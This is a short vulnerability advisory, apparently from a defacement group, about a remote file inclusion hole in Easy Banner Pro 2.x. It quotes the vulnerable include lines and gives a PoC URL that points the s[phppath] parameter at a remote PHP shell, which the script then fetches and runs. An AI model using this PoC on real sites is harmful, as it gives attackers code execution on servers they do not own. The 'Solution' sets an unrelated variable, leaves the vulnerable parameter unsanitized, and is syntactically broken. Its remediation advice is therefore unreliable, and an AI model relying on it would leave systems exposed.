SecurityvulnsSECURITYVULNS:DOC:15663Easy Banner Pro Version 2.8 <= Remote File Inclusion
±-------------------------------------------------------------------
-
Easy Banner Pro Version 2.* <= Remote File Inclusion
±-------------------------------------------------------------------
-
Affected Software .: Easy Banner Pro Version
-
Venedor …: http://www.phpwebscripts.com/
-
Class …: Remote File Inclusion
-
Risk …: high (Remote File Execution)
-
Found by …: rUnViRuS
-
Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
-
Contact …: stormhacker[at]hotmail[.]com
±-------------------------------------------------------------------
-
Code info.php:
-
…
-
include('./functions.php');
-
include_once("$s[phppath]/data/messages.php");
-
if (!$s[nocron]) include_once("$s[phppath]/rebuild_f.php");
-
include('./data/time.php');
-
…
±-------------------------------------------------------------------
-
$s[phppath] is not properly sanitized before being used.
-
The bug is in the "PDD" Package for PHPSelect Web Development Division.
±-------------------------------------------------------------------
-
Solution:
-
Add this line to your php-file:
-
$Application_Root ="user/dir" //Your root path
±-------------------------------------------------------------------
-
PoC:
http://[target]/info.php?s[phppath]=http://phpshell
±-------------------------------------------------------------------
-
[W]orld [D]efacers [T]eam
-
Greets:
-
|| rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
-
|| Pro Hacker ||
±------------------------[ W D T ]----------------------------------